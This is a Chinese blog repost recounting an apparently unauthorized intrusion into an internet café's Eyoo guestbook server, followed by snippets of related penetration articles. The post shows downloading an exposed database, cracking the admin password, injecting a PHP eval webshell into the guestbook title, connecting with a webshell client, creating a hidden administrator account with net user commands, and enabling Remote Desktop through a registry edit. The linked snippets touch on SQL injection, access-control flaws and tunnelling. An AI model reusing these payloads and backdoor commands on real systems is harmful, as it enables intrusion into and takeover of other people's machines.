记一次网吧渗透(未完)

最新推荐文章于 2021-05-26 16:26:57 发布
最新推荐文章于 2021-05-26 16:26:57 发布
阅读量288 收藏 2
点赞数
原文链接:http://www.cnblogs.com/pcx69/p/3661315.html
版权
网吧使用易游留言板,存在低级漏洞 http://www.fucktest.com:18897/eyooboard/include/data/message.db 得到数据库。文本文档打开,得到admin加密后密码 1 解密后登录后台,留言板标题插入一句话。 ${${eval($_POST['cmd'])}} 报错, 1 本地搭建测试环境。查看 configure.data.php。发现插进去是这样的。。 1 等管理员重装留言板后,再插。 ${${eval($_POST[cmd])}} 成功,菜刀链接 1 接着 net user admin$ admin123 /add net localgroup administrators admin$ /add 
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

得到管理员。

mstsc链接



未完待续。。。

转载于:https://www.cnblogs.com/pcx69/p/3661315.html

njit_peiyuan
关注
【萌新】一次渗透小站的过程
Leep0rt的博客
09-07 1016
一开始接触该站 先随便翻阅了一些目录 发现在URL中 “/ProductView.asp?ID=1021    ” 这几个字段格外引人瞩目 于是 二话不说 看看有没有注入点 输入一个  '  看一看  发现报错了!!! 然后惯例 and 1=1, and 1=11 发现存在云锁   突然想起来云锁存在一个绕过的漏洞 具体什么的百度一下看看吧! 云锁s
一次对i春秋某网络靶场平台的渗透
qq_20065991的博客
09-02 1586
如下图所示即为这次渗透的目标 i春秋网络靶场平台 在用户中心的站内信功能中发现了非常有意思的事情,在发送站内信的时候接收用户的username会自动补全。 想起来老师下发账号的时候给了我们一个文件里面有我们整个班级的用户名和密码,盲猜应该管理员存在弱口令 如上图,猜测管理员账号密码也是123456 在人员管理页面发现可以修改用户名的密码,竟然还不用验证 抓包看一眼,竟然是用userid来传递参数的,那这感觉冥冥之中就存在越权漏洞呀 将userid修改为1,返回包u...
Linux渗透网吧服务器,使用kail linux及Metasploit对服务器进行渗透测试
weixin_33641311的博客
05-02 590
最近研究了两天Metasploit渗透测试,这里整理下笔。经过几天的摸索,大体总结对服务器进行渗透的话可分为以下3个阶段:1、收集信息:首先得知道目标服务器使用什么系统、开放哪些端口、使用哪些应用等。2、针对性扫描:了解到目标服务器开启的端口(3389、3306、1521;FTP、Samba、SSH、HTTP等)后,我们再根据端口等信息判断目标服务器使用了哪些应用,再对应用进行针对性的探测,判断...
Linux渗透网吧服务器,[St0rs Team]看我如何渗透网吧并附上0day
weixin_29029169的博客
05-02 268
该楼层疑似违规已被系统折叠隐藏此楼查看此楼反编译下:mmspack.FileUpload:public int upload(HttpServletRequest paramHttpServletRequest, String paramString)throws IOException{this.paramMap.clear();this.paramMap.putAll(paramHttpSe...
网吧内网渗透
weixin_30763397的博客
01-07 956
0X01准备 vmware,Kali linux,啊D网络工具包 0x02初探 我上网的这台电脑IP是192.168.21.128 先使用kali linux虚拟机对整个网络进行扫描! 然发现192.168.1.1开放了23 telnet端口!(为什么只扫到了1.x网段呢?)详解移步 之前是打算用armitage,但是不知道为什么一直连接不上! 用啊D直接对整个网络进行扫描 ...
渗透测试整流程(待续)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
05-26 1723
目录 信息收集 渗透测试流程图 什么是渗透测试? 渗透测试就是利用我们所掌握的网络安全知识,对目标网站进行一步一步的渗透,发现其中存在的漏洞和隐藏的风险,然后编写一篇测试报告,提供给我们的客户。客户根据测试报告,对网站进行漏洞修补,以防止被黑客的入侵服务器,造成不可估量的损失! 开始一次渗透测试前,一定要确保我们的所有渗透测试目标,都已经拿到了客户的授权。如果没有拿到授权就对一个网站进行测试,《网络安全法》了解一下 渗透测试可分为白盒测试和黑盒测试 白盒测试: 白盒测试就是客户给我们
ElasticSearch从入门到精通,史上最全(持续更新,待续,每天一点点)
热门推荐
Null的博客
07-30 13万+
目录 1.ElasticSearch的简介 2.用数据库实现搜素的功能 3.ES的核心概念 3.1 NRT(Near Realtime)近实时 3.2 cluster集群,ES是一个分布式的系统 3.3 Node节点,就是集群中的一台服务器 3.4 index 索引(索引库) 3.5 type类型 3.6 document:文档 3.7 Field 字段 3.8 sha...
服装材料学-第一章第一节().xjm
最新发布
11-16
服装材料学-第一章第一节().xjm
网吧留言工具
02-20
网吧留言工具
易游留言板
12-13
易游留言板将以全新的架构与全新的界面呈现给用户一个不一样的使用体验。 目前市面上主流的留言板多数都差不多,特别是界面模板就那么几个,最典型的就是使用较老的DZ和PHPWind论坛模板样式做的界面。这种留言板都是一个架构,需要网管自己手动架设web服务器只有少数的借用一些工具或者脚本来实现自动架设服务器。而易游全新的留言板虽然采用的也是web服务器架构,但是全不需要手动架设服务端,安装成后即可立即使用,无需繁琐的web服务器架设。 易游留言板没有使用通用的论坛式的交互界面,而是使用全新的界面和布局,默认提供几种皮肤可供用户自行更换,每种皮肤是一个主题可以根据网吧的环境自行选择合适的主题以满足网吧的个性化需求。皮肤主题会不断的提供后续更新让界面不会出现过时的情况,而皮肤的美观性将比其他留言板更加华丽,界面的布局也更加合理,在界面上除了有留言板功能外还将网吧公告也集成了,以供网吧方便的开展各种与玩家互动的活动。
网吧留言板
11-15
本地搭建网吧留言板,asp程序,下载,解压,打开文件夹,找到“asp微型调试工具”输入本机ip地址即可
网吧个人磁盘_针对网吧运维公司的黑盒渗透
weixin_39929635的博客
12-18 985
事情回到2017年,当时我在i春秋也发过一些渗透网吧的技巧,这篇文章算是总结攻击思路,以后遇到类似攻击希望可以做到防御。本文章内容虽然授权渗透,但是如果企业或公司遇到真实攻击事件攻击者难道会告诉你,我来渗透你电脑吗,绝对是不存在的。在渗透后我会把报告总结会销毁渗透过程中储存的日志资产。先讲讲渗透思路(killChain)执行攻击链先讲讲什么是killChain ,维基百科可以查到,...
一次网吧渗透测试
weixin_34082177的博客
03-27 616
发现网吧使用易游留言板, 转载于:https://www.cnblogs.com/pcx69/p/3661316.html
实战经验:网吧入侵全攻略(3)
净心编程
12-29 1695
        打开控制面板--管理工具--计算机管理   操作-连接到另一计算机.   然后输入IP192.168.0.225 图5  呵.等一会就可以看到成功了...你看到了什么?   更爽的是我们可以远程开启他的服务...在这里启动他的telnet服务. 图6  OK了...   本地打开一cmd   输入   G:/>telnet 192.168.0.225   回车后出现   Serve
一次整的渗透测试流程
ths512的博客
03-05 2387
渗透测试 渗透测试就是利用我们所掌握的渗透知识,对一个网站进行一步一步的渗透,发现其中存在的漏洞和隐藏的风险,然后撰写一篇测试报告,提供给我们的客户。客户根据我们撰写的测试报告,对网站进行漏洞修补,以防止黑客的入侵! 渗透测试的前提是我们得经过用户的授权,才可以对网站进行渗透。如果我们没有经过客户的授权而对一个网站进行渗透测试的话,这是违法的。去年的6.1日我国颁布了《网络安全...
内网渗透 局域网后渗透
干铮的博客
08-18 908
网络环境 实验前提 1.外网win7上传一句话菜刀连接2008 2.上传 3.kali配置隧道端口 sudo vim /etc/proxychains.conf ./reGeorgSocksProxy.py -u "http://10.1.1.1/tunnel.nosocket.php" -p 1111 proxychains msfconsole
一次小小的内网渗透实战(无后渗透阶段)
qq_38240166的博客
05-04 4790
时隔这么久,读书也读了,考试也考了。开始接受别人给我一次实战的任务。--一次学习不久的实战,以后看到可能会笑自己轻喷有问题可以留言给我。谢谢这次选在了离我家比较近的网吧。每次上网回家身上都是一股烟味,点比较烦。所以才会想来这里。让我们开始吧1、渗透环境配置需要材料有:                 pentestbox2、存活ip寻找。nmap -sP 192.168.0.0/24看着这些...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值